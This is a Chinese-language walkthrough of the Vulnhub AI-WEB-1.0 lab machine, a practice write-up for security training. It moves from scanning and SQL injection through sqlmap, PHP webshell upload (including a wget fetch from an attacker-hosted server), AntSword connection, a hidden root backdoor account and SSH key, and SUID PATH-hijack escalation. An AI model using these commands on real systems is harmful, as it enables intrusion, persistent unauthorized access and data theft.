当前位置: 首页 > news >正文

Vulnhub靶机AI-WEB-1.0渗透测试:SQL注入到蚁剑连接的5个关键步骤

Vulnhub靶机AI-WEB-1.0渗透实战:从SQL注入到蚁剑连接的深度解析

在网络安全领域,靶机渗透测试是提升实战能力的重要途径。Vulnhub平台提供的AI-WEB-1.0靶机,以其精心设计的漏洞环境,成为学习Web应用渗透的理想选择。本文将深入剖析从发现SQL注入漏洞到最终通过蚁剑建立完整连接的完整过程,不仅展示标准操作流程,更会揭示每个环节背后的技术原理和实战技巧。

1. 环境准备与信息收集

渗透测试的第一步永远是充分的信息收集。对于AI-WEB-1.0靶机,我们需要先确定目标网络环境的基本参数。

网络环境确认

# 使用arp-scan扫描本地网络 arp-scan -l --interface=eth0

输出示例

192.168.109.141 00:0c:29:12:34:56 VMware, Inc.

确认靶机IP后,进行全面的端口扫描:

nmap -sV -T4 -p- 192.168.109.141

关键发现

  • 80/tcp open http Apache httpd 2.4.29

目录扫描实战技巧

# 使用dirsearch进行深度扫描 dirsearch -u http://192.168.109.141/ -e php,html -x 403,404 -t 50

扫描结果中需要特别关注:

  • /m3diNf0/info.php- PHP信息页面
  • /se3reTdir777/index.php- 可能存在注入点的页面

提示:在实际渗透中,robots.txt和常见的备份文件(如.bak, .swp)往往包含重要线索,务必检查。

2. SQL注入漏洞的深度利用

发现/se3reTdir777/index.php存在SQL注入后,我们需要系统性地利用这个漏洞获取更多信息。

手工验证注入点

1' AND 1=1-- - # 正常返回 1' AND 1=2-- - # 无返回结果

使用sqlmap自动化注入

sqlmap -u "http://192.168.109.141/se3reTdir777/index.php" \ --data="uid=1&Operation=Submit" \ --risk=3 --level=5 \ --batch

数据库信息获取流程

命令参数获取信息示例结果
--dbs数据库列表aiweb1, information_schema
-D aiweb1 --tables表列表user, systemUser
-D aiweb1 -T user --columns字段列表id, firstName, lastName
--dump表数据管理员凭证等敏感信息

高级技巧:直接获取系统shell

sqlmap -u "http://192.168.109.141/se3reTdir777/index.php" \ --data="uid=1&Operation=Submit" \ --os-shell --batch

成功执行需要满足:

  1. 数据库用户具有FILE权限
  2. 知道Web目录绝对路径
  3. secure_file_priv参数未限制

3. 多种Webshell上传方法对比

获取系统访问权限的关键是上传Webshell,这里介绍三种实用方法。

方法一:直接文件写入

# 准备一句话木马 echo '<?php system($_GET["cmd"]);?>' > shell.php # 使用sqlmap写入 sqlmap -u "http://192.168.109.141/se3reTdir777/index.php" \ --file-write=shell.php \ --file-dest=/var/www/html/se3reTdir777/uploads/shell.php

方法二:利用Web服务器下载

# 在Kali启动临时Web服务 python3 -m http.server 8080 # 在靶机执行下载 wget http://192.168.109.139:8080/shell.php -O /var/www/html/se3reTdir777/uploads/shell.php

方法三:利用PHP特性直接生成

<?php file_put_contents('shell.php', '<?php system($_GET["cmd"]);?>');

注意:实际环境中需根据目标系统配置选择最适合的方法,并注意清理痕迹。

4. 蚁剑连接与权限维持

成功上传Webshell后,使用蚁剑(AntSword)建立稳定连接。

蚁剑配置关键参数

  • URL:http://192.168.109.141/se3reTdir777/uploads/shell.php
  • 连接密码:cmd(根据使用的Webshell类型)
  • 编码器:default

高级功能使用

  1. 虚拟终端操作
  2. 文件管理
  3. 数据库管理
  4. 端口转发

权限维持技巧

# 创建隐藏后门账户 useradd -o -u 0 -g 0 -s /bin/bash -p $(openssl passwd -1 password) backdoor # 添加SSH密钥认证 mkdir -p /root/.ssh echo "ssh-rsa AAAAB3NzaC..." >> /root/.ssh/authorized_keys

5. 提权与系统深度控制

从Web权限到系统完全控制需要有效的提权手段。

常见提权方法对比

方法适用条件风险等级
SUID滥用存在配置错误的SUID程序
内核漏洞未打补丁的系统
服务配置错误错误配置的服务权限
计划任务可写的计划任务脚本

实战案例:利用SUID提权

# 查找具有SUID位的程序 find / -perm -4000 2>/dev/null # 发现异常程序 /usr/bin/custom-script # 分析程序行为 ltrace /usr/bin/custom-script # 利用程序缺陷 echo '/bin/bash' > /tmp/exploit chmod +x /tmp/exploit export PATH=/tmp:$PATH /usr/bin/custom-script

获取最终flag

find / -name "*flag*" -type f 2>/dev/null cat /root/flag.txt

渗透测试完成后,务必清理所有上传的文件和创建的后门账户,保持职业道德。整个过程中学到的不仅是技术操作,更重要的是理解每个漏洞产生的根本原因和防御方法。

http://www.jsqmd.com/news/483214/

相关文章:

  • GME-Qwen2-VL-2B-Instruct快速上手:Git代码仓库管理与AI Commit信息生成
  • Irony Mod Manager高效管理实用指南:从配置到扩展的全流程解析
  • Vue3+Pinia用户状态管理:如何避免页面刷新导致数据丢失
  • JFR与JMC从入门到精通:30秒搞定JVM性能监控与分析
  • 避坑指南:uniapp自定义环境变量那些容易踩的雷(H5打包实测)
  • Coqui TTS安装包下载与部署实战:从环境配置到生产级优化
  • 实战指南:如何用Python代码检测并防御GPT-4的提示词注入攻击
  • 4大突破:Binwalk固件分析工具的智能解析技术全揭秘
  • 资源争抢频发?Docker 27智能调度器上线后,AI训练任务排队时间缩短83%,你还没升级吗?
  • 蓝牙PCB天线设计避坑指南:从0.4mm到2.4mm板厚的实战经验分享
  • 飞牛NAS+OpenWebUI+Docker三件套:手把手教你打造私人DeepSeek聊天室(附外网访问技巧)
  • 解密微信小程序wxapkg文件:如何通过AppID逆向获取源码?
  • 作品集:Neeshck-Z-lmage_LYX_v2不同LoRA风格出图对比
  • Vue+iframe实战:打造可切换的Grafana监控面板(避坑指南)
  • 汉邦激光接连多项3D打印应用突破:极薄壁+米级无支撑打印!
  • MPICH vs OpenMPI:如何根据你的HPC需求选择最佳MPI实现(2024最新对比)
  • 微软GraphRAG开源实战:如何用知识图谱提升RAG的全面性与多样性
  • 3个痛点解决:用VNote打造高效Markdown笔记系统
  • 基于GD32E230C8T6的DS18B20单总线温度传感器驱动移植与精度解析
  • SSH登录总被拒绝?3分钟搞定服务器密码登录配置(附安全建议)
  • 大模型评测不再靠人工抽样!Dify+私有化Judge模型如何将评估成本降低83%,准确率提升至96.7%?
  • Llama Factory快速部署指南:一键启动Web界面,轻松训练模型
  • 高效管理Signal Properties:批量操作‘Show propagated signals‘的实用技巧
  • 01|LangGraph | 从入门到实战 | 架构篇
  • 突破变形测量瓶颈:Ncorr开源工具的深度应用指南
  • CycleGAN实战:如何用自定义数据集实现图像风格迁移(附完整代码)
  • 颠覆式AI创作:TaleStreamAI如何将小说推文制作效率提升300%
  • 从零开始理解Transformer:注意力机制与迁移学习的完美结合
  • 南北阁Nanbeige4.1-3B与Git集成:智能代码审查实战
  • 鸿蒙NEXT权限申请避坑指南:这些细节不注意,你的应用可能被拒审